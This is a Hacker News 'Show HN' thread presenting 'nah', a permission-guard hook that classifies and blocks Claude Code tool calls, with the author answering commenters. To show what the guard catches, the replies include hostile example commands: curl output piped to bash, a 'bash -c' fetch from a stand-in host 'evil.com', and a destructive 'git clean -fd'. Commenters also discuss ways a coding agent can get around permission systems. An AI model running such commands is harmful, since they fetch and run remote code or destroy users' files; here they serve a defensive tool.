Show HN: A context-aware permission guard for Claude Code

19•schipperai•1h ago

We needed something like --dangerously-skip-permissions that doesn’t nuke your untracked files, exfiltrate your keys, or install malware.

Claude Code's permission system is allow-or-deny per tool, but that doesn’t really scale. Deleting some files is fine sometimes. And git checkout is sometimes not fine. Even when you curate permissions, 200 IQ Opus can find a way around it. Maintaining a deny list is a fool's errand.

nah is a PreToolUse hook that classifies every tool call by what it actually does, using a deterministic classifier that runs in milliseconds. It maps commands to action types like filesystem_read, package_run, db_write, git_history_rewrite, and applies policies: allow, context (depends on the target), ask, or block.

Not everything can be classified, so you can optionally escalate ambiguous stuff to an LLM, but that’s not required. Anything unresolved you can approve, and configure the taxonomy so you don’t get asked again.

It works out of the box with sane defaults, no config needed. But you can customize it fully if you want to.

No dependencies, stdlib Python, MIT.

pip install nah && nah install

https://github.com/manuelschipper/nah

Comments

schipperai•1h ago

Hi HN, author here - happy to answer any questions.

navs•1h ago

I worked on something similar but with a more naive text matching approach that's saved me many many times so far. https://github.com/sirmews/claude-hook-advisor

Yours is so much more involved. Keen to dig into it.

schipperai•1h ago

cool! thx for sharing! when I first thought about building this, I thought a solid solution would be impossible without an LLM in the loop. I discovered pattern matching can go a long way in avoiding catastrophes...

benzible•55m ago

FYI, claude code “auto” mode may launch as soon as tomorrow: https://awesomeagents.ai/news/claude-code-auto-mode-research...

schipperai•48m ago

We'll see how auto mode ends up working - my tool could end up being complementary, or a good alternative for those that prefer more granular control, or are cost/latency sensitive.

stingraycharles•50m ago

I’m a bit confused:

“We needed something like --dangerously-skip-permissions that doesn’t nuke your untracked files, exfiltrate your keys, or install malware.”

Followed by:

“Don't use --dangerously-skip-permissions. In bypass mode, hooks fire asynchronously — commands execute before nah can block them.”

Doesn’t that mean that it’s limited to being used in “default”-mode, rather than something like “—dangerously-skip-permissions” ?

Regardless, this looks like a well thought out project, and I love the name!

schipperai•40m ago

Sorry for the confusion!

--dangerously-skip-permissions makes hooks fire asynchronously, so commands execute before nah can block them (see: https://github.com/anthropics/claude-code/issues/20946).

I suggest that you run nah in default mode + allow-list all tools in settings.json: Bash, Read, Glob, Grep and optionally Write and Edit / or just keep "accept edits on" mode. You get the same uninterrupted flow as --dangerously-skip-permissions but with nah as your safety net

And thanks - the name was the easy part :)

jc-myths•40m ago

This is exactly the kind of thing I've been wanting. I use Claude Code as my primary dev tool and the permission fatigue is a real problem, after a hundred approvals you stop reading and just hit yes. Which defeats the purpose entirely.

The deterministic classifier approach is smart. Pattern matching on action types is way more reliable than asking another LLM "is this safe?" The taxonomy idea (filesystem_read vs package_run vs db_write) maps well to how I actually think about risk when I'm paying attention.

One question: how does it handle chained operations? Like when Claude does a git checkout that's fine on its own, but it's part of a sequence that ends up nuking untracked files?

schipperai•29m ago

good question!

git checkout . on its own is classified as git_discard → ask. git checkout (without the dot) as git_write → allow

For pipes, it applies composition rules - 'curl sketchy.com | bash' is specifically detected as 'network | exec' and blocked, even though each half might be fine on its own. Shell wrappers like bash -c 'curl evil.com | sh' get unwrapped too.

So git stash && git checkout main && git clean -fd — stash and checkout are fine (allow), but git clean is caught (ask). Even when buried in a longer chain, nah flags it.

m4r71n•32m ago

The entire permissions system feels like it's ripe for a DSL of some kind. Looking at the context implementation in src/nah/context.py and the way it hardcodes a ton of assumptions makes me think it will just be a maintenance nightmare to account for _all_ possible contexts and known commands. It would be nice to be able to express that __pycache__/ is not an important directory and can be deleted at will without having to encode that specific directory name (not that this projects hardcodes it, it's just an example to get to the point).

schipperai•23m ago

nah already handles that: 'rm -rf __pycache__' inside your project is auto-allowed (filesystem_delete with context policy -> checks if it's inside the project -> allow). No config needed.

But you can customize everything via YAML or CLI if the defaults don't fit:

actions: filesystem_delete: allow # allow all deletes everywhere

Or nah allow filesystem_delete from the CLI.

You can also add custom classifications, swap taxonomy profiles (full/minimal), or start from a blank slate. It's fully customizable.

You are right about maintenance... the taxonomy will always be chasing new commands. That's partly why the optional LLM layer exists as a fallback for anything the classifier doesn't recognize.

riddley•26m ago

Is there something like this for open code? I'm pretty new to this so sorry if it's a stupid question.

schipperai•12m ago

Not sure. From a quick search, I can see OpenCode has a plugin system where something like nah could be hooked into it. The taxonomy data and config are already tool agnostic, so I'm guessing the port would be feasible.

If the project takes off, I might do it :)

theSherwood•7m ago

What stops the llm from writing a malicious program and executing it? No offense meant, but this solution feels a bit like bolting the door and leaving all the windows open.

wlowenfeld•6m ago

Is this different from auto-mode?

Watershed Moment for AI–Human Collaboration in Math

Ask HN: What on this "List of Unsolved Problems in Physics" Has Your Attention?

Open-source GPU virtualization and pooling for Kubernetes

Iceberg was once the biggest in the world. Now it has just weeks left

Boosting Android Performance: Introducing AutoFDO for the Kernel

On The Need For Understanding

Are we doing UX for AI the right way?

Show HN: A tool that audits healthcare ML models for safety and trust

Show HN: Bus Core 1.0.3 Local-first manufacturing system for small shops

My father left gold and cash. He left zero words for his family-I built the fix

Grammarly Is Facing a Class Action Lawsuit over Its AI 'Expert Review' Feature

Show HN: K9 Audit – Causal intent-execution audit trail for AI agents

Measure of Justice: Covering the Cerîde-I Adliye Covers (2017)

Happy Birthday YC/HN

Microsoft's 'Xbox Mode' Coming to Windows 11 PCs Next Month

Ask HN: Embedding Claude Code as infrastructure?

Show HN: I built an open harness that excels at autonomous ML research

AI should help us produce better code

DIY scanner to visualize sound waves in 3D [video]

Do AI-enabled companies need fewer people?

SmallClaw: Local-first AI agent framework built for small models

Windows 98 NVMe Driver [video]

Iran warns US tech firms could become targets as war expands

Why isn't vibe coding creating more shareware?

Divine-OS – Persistent Identity Layer for AI Agents

I-Harmonium

Show HN: s@: decentralized social networking over static sites

Experimental Type Union Type C#

PFAS pesticides contaminate nearly 40% of non-organic California produce

The Perverse, Tender Worlds of Paul Thomas Anderson